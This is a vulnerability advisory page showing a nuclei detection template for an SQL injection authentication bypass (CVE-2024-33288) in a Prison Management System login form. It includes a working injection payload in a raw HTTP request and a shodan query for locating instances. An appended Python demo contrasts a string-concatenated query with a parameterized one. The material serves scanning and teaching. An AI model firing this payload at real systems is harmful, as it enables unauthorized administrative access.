nuclei | ProjectDiscovery | NUCLEI:CVE-2024-33288
History: May 16, 2024 - 8:56 a.m.

Prison Management System - SQL Injection Authentication Bypass

2024-05-16 08:56:24
ProjectDiscovery
github.com
Tags: prison management system, sql injection, authentication bypass, cve2024, vulnerability, exploit, web security

AI Score: 6.8
Confidence: High

A SQL injection vulnerability was found on the login page of Prison Management System.

id: CVE-2024-33288

info:
  name: Prison Management System - SQL Injection Authentication Bypass
  author: Kazgangap
  severity: high
  description: |
    Sql injection vulnerability was found on the login page in Prison Management System
  reference:
    - https://en.0day.today/exploit/39610
    - https://www.sourcecodester.com/sql/17287/prison-management-system.html
  metadata:
    verified: true
    max-request: 2
    shodan-query: title:"Prison Management System"
  tags: cve,cve2024,cms,sqli

http:
  - raw:
      - |
        POST /Admin/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        txtusername=admin%27+or+%271%27+%3D%271&txtpassword={{randstr}}&btnlogin=

      - |
        GET /Admin/index.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<p>Change Password</p>"
          - "<p>Logout</p>"
          - "Admin Dashboard | Prison Management system"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100859ec311a5b87c8613179df918539075c5fd10a9d17a0273f0970d74ab5ea0e90221008c39c278e0ce4d1b08af7daa3356e7901998adf7c17a2919323d4a935efff082:922c64590222798bb761d5b6d8e72950
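
Added example (not part of the original page or of the template): it decodes the form body sent in the template's first request and shows why a login query built by string concatenation accepts it with a random password, while a parameterized query rejects it. The `users` table, its columns, the stored password, the concatenated query shape and the use of SQLite in place of the application's database are assumptions; the application's source is not shown on this page.

```python
import sqlite3
from urllib.parse import parse_qs

# Body of the template's first request; {{randstr}} replaced by a constructed value.
BODY = "txtusername=admin%27+or+%271%27+%3D%271&txtpassword=Zk3qP9&btnlogin="

def make_db():
    # Constructed table and credentials (assumption: real schema is not on the page).
    # Plaintext password only to keep the demo short.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    return db

def parse_form(body):
    # URL-decode the form fields the way the server would receive them.
    form = parse_qs(body, keep_blank_values=True)
    return form["txtusername"][0], form["txtpassword"][0]

def login_concat(db, user, pw):
    # Assumed vulnerable shape: input is pasted into the SQL text, so a quote in
    # txtusername ends the string literal and the rest is parsed as SQL.
    # AND binds tighter than OR, so the password test stops applying to 'admin'.
    sql = ("SELECT username FROM users WHERE username = '" + user +
           "' AND password = '" + pw + "'")
    return db.execute(sql).fetchone() is not None

def login_param(db, user, pw):
    # Hardened form: placeholders keep both fields as data, never as SQL syntax.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (user, pw)).fetchone() is not None

if __name__ == "__main__":
    db = make_db()
    user, pw = parse_form(BODY)
    print("decoded txtusername:", repr(user))
    print("concatenated query accepts:", login_concat(db, user, pw))
    print("parameterized query accepts:", login_param(db, user, pw))
```
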
